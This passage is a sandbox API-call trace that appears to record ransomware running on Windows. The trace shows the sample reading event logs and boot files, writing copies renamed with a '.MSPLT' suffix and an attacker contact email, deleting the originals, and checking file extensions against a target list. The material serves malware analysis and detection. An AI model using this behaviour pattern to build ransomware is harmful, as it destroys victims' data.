dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.487] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=45984) returned 1 [0286.487] CloseHandle (hObject=0x348) returned 1 [0286.487] GetFileAttributesW (lpFileName="C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui")) returned 0x20 [0286.487] GetFileAttributesW (lpFileName="C:\\Boot\\pt-PT\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.487] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.488] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.488] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.488] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=74080) returned 1 [0286.488] CloseHandle (hObject=0x348) returned 1 [0286.488] GetFileAttributesW (lpFileName="C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui")) returned 0x20 [0286.488] GetFileAttributesW (lpFileName="C:\\Boot\\qps-ploc\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.488] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.489] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.489] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.489] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=54168) returned 1 [0286.489] CloseHandle (hObject=0x348) returned 1 [0286.489] GetFileAttributesW (lpFileName="C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui")) returned 0x20 [0286.489] GetFileAttributesW (lpFileName="C:\\Boot\\qps-ploc\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.489] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.489] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0286.489] CreateFileW (lpFileName="C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.490] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=92576) returned 1 [0286.490] CloseHandle (hObject=0x348) returned 1 [0286.490] GetFileAttributesW (lpFileName="C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll")) returned 0x20 [0286.490] GetFileAttributesW (lpFileName="C:\\Boot\\Resources\\bootres.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\resources\\bootres.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.490] CreateFileW (lpFileName="C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.490] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.490] CreateFileW (lpFileName="C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0286.546] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=12192) returned 1 [0286.546] CloseHandle (hObject=0x320) returned 1 [0286.546] GetFileAttributesW (lpFileName="C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui")) returned 0x20 [0286.546] GetFileAttributesW (lpFileName="C:\\Boot\\Resources\\en-US\\bootres.dll.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.546] CreateFileW (lpFileName="C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.547] lstrcmpiW (lpString1=".sys", lpString2=".MSPLT") returned 1 [0286.547] CreateFileW (lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.548] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0286.548] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0286.705] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0286.705] CloseHandle (hObject=0x438) returned 1 [0286.705] GetFileAttributesW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx")) returned 0x20 [0286.706] GetFileAttributesW (lpFileName="C:\\Logs\\Application.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\application.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.706] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0286.706] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0286.706] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0286.706] CreateFileW (lpFileName="C:\\Logs\\Application.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\application.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0286.706] GetLastError () returned 0x0 [0286.707] ReadFile (in: hFile=0x438, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0286.781] WriteFile (in: hFile=0x43c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0286.783] ReadFile (in: hFile=0x438, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0286.784] WriteFile (in: hFile=0x43c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xf4, lpOverlapped=0x0) returned 1 [0286.784] SetEndOfFile (hFile=0x43c) returned 1 [0286.794] CloseHandle (hObject=0x43c) returned 1 [0286.796] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0286.799] SetEndOfFile (hFile=0x438) returned 1 [0286.800] CloseHandle (hObject=0x438) returned 1 [0286.800] SetFileAttributesW (lpFileName="C:\\Logs\\Application.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0286.801] DeleteFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx")) returned 1 [0286.837] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0286.837] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0286.837] lstrlenW (lpString=".doc") returned 4 [0286.837] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0286.837] lstrlenW (lpString=".docx") returned 5 [0286.837] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0286.837] lstrlenW (lpString=".pdf") returned 4 [0286.837] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0286.837] lstrlenW (lpString=".xls") returned 4 [0286.837] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0286.837] lstrlenW (lpString=".xlsx") returned 5 [0286.837] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0286.837] lstrlenW (lpString=".ppt") returned 4 [0286.837] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0286.837] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0286.837] lstrlenW (lpString=".zip") returned 4 [0286.837] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0286.837] lstrlenW (lpString=".rar") returned 4 [0286.838] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0286.838] lstrlenW (lpString=".bz2") returned 4 [0286.838] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0286.838] lstrlenW (lpString=".7z") returned 3 [0286.838] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0286.838] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0286.838] lstrlenW (lpString=".dbf") returned 4 [0286.838] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0286.838] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0286.838] lstrlenW (lpString=".1cd") returned 4 [0286.838] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0286.838] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0286.838] lstrlenW (lpString=".jpg") returned 4 [0286.838] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0286.838] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0286.838] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0286.838] lstrlenW (lpString=".doc") returned 4 [0286.838] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0286.838] lstrlenW (lpString=".docx") returned 5 [0286.838] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0286.838] lstrlenW (lpString=".pdf") returned 4 [0286.839] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0286.839] lstrlenW (lpString=".xls") returned 4 [0286.839] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0286.839] lstrlenW (lpString=".xlsx") returned 5 [0286.839] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0286.839] lstrlenW (lpString=".ppt") returned 4 [0286.839] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0286.839] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0286.839] lstrlenW (lpString=".zip") returned 4 [0286.839] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0286.839] lstrlenW (lpString=".rar") returned 4 [0286.839] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0286.839] lstrlenW (lpString=".bz2") returned 4 [0286.839] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0286.839] lstrlenW (lpString=".7z") returned 3 [0286.839] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0286.839] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0286.839] lstrlenW (lpString=".dbf") returned 4 [0286.839] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0286.839] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0286.839] lstrlenW (lpString=".1cd") returned 4 [0286.839] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0286.840] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0286.840] lstrlenW (lpString=".jpg") returned 4 [0286.840] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0286.840] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0286.840] lstrlenW (lpString="Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 47 [0286.840] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0286.845] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0286.845] CloseHandle (hObject=0x430) returned 1 [0286.845] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx")) returned 0x20 [0286.845] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.845] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0286.846] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0286.846] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0286.846] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0286.858] GetLastError () returned 0x0 [0286.858] ReadFile (in: hFile=0x430, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0286.910] WriteFile (in: hFile=0x438, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0286.914] ReadFile (in: hFile=0x430, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0286.914] WriteFile (in: hFile=0x438, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x132, lpOverlapped=0x0) returned 1 [0286.915] SetEndOfFile (hFile=0x438) returned 1 [0286.915] CloseHandle (hObject=0x438) returned 1 [0286.920] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0286.920] SetEndOfFile (hFile=0x430) returned 1 [0286.922] CloseHandle (hObject=0x430) returned 1 [0286.922] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0286.922] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx")) returned 1 [0286.923] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0286.923] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0286.923] lstrlenW (lpString=".doc") returned 4 [0286.923] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0286.923] lstrlenW (lpString=".docx") returned 5 [0286.923] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0286.923] lstrlenW (lpString=".pdf") returned 4 [0286.923] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0286.923] lstrlenW (lpString=".xls") returned 4 [0286.923] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0286.923] lstrlenW (lpString=".xlsx") returned 5 [0286.923] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0286.923] lstrlenW (lpString=".ppt") returned 4 [0286.923] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0286.923] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0286.923] lstrlenW (lpString=".zip") returned 4 [0286.924] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0286.924] lstrlenW (lpString=".rar") returned 4 [0286.924] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0286.924] lstrlenW (lpString=".bz2") returned 4 [0286.924] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0286.924] lstrlenW (lpString=".7z") returned 3 [0286.924] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0286.924] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0286.924] lstrlenW (lpString=".dbf") returned 4 [0286.924] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0286.924] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0286.924] lstrlenW (lpString=".1cd") returned 4 [0286.924] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0286.924] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0286.924] lstrlenW (lpString=".jpg") returned 4 [0286.924] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0286.924] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0286.924] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0286.924] lstrlenW (lpString=".doc") returned 4 [0286.924] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0286.924] lstrlenW (lpString=".docx") returned 5 [0286.925] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0286.925] lstrlenW (lpString=".pdf") returned 4 [0286.925] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0286.925] lstrlenW (lpString=".xls") returned 4 [0286.925] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0286.925] lstrlenW (lpString=".xlsx") returned 5 [0286.925] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0286.925] lstrlenW (lpString=".ppt") returned 4 [0286.925] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0286.925] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0286.925] lstrlenW (lpString=".zip") returned 4 [0286.925] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0286.925] lstrlenW (lpString=".rar") returned 4 [0286.925] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0286.925] lstrlenW (lpString=".bz2") returned 4 [0286.925] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0286.925] lstrlenW (lpString=".7z") returned 3 [0286.925] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0286.925] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0286.925] lstrlenW (lpString=".dbf") returned 4 [0286.925] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0286.925] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0286.925] lstrlenW (lpString=".1cd") returned 4 [0286.925] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0286.925] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0286.925] lstrlenW (lpString=".jpg") returned 4 [0286.925] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0286.926] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0286.926] lstrlenW (lpString="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 78 [0286.926] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0287.563] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=69632) returned 1 [0287.563] CloseHandle (hObject=0x440) returned 1 [0287.563] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx")) returned 0x20 [0287.564] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.564] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0287.564] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.564] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.564] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0287.565] GetLastError () returned 0x0 [0287.565] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0287.705] WriteFile (in: hFile=0x3f4, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0287.708] ReadFile (in: hFile=0x440, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0287.708] WriteFile (in: hFile=0x3f4, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x170, lpOverlapped=0x0) returned 1 [0287.708] SetEndOfFile (hFile=0x3f4) returned 1 [0287.709] CloseHandle (hObject=0x3f4) returned 1 [0287.712] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0287.712] SetEndOfFile (hFile=0x440) returned 1 [0287.714] CloseHandle (hObject=0x440) returned 1 [0287.714] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0287.716] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx")) returned 1 [0287.716] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0287.716] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0287.716] lstrlenW (lpString=".doc") returned 4 [0287.716] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0287.716] lstrlenW (lpString=".docx") returned 5 [0287.716] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0287.716] lstrlenW (lpString=".pdf") returned 4 [0287.716] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0287.716] lstrlenW (lpString=".xls") returned 4 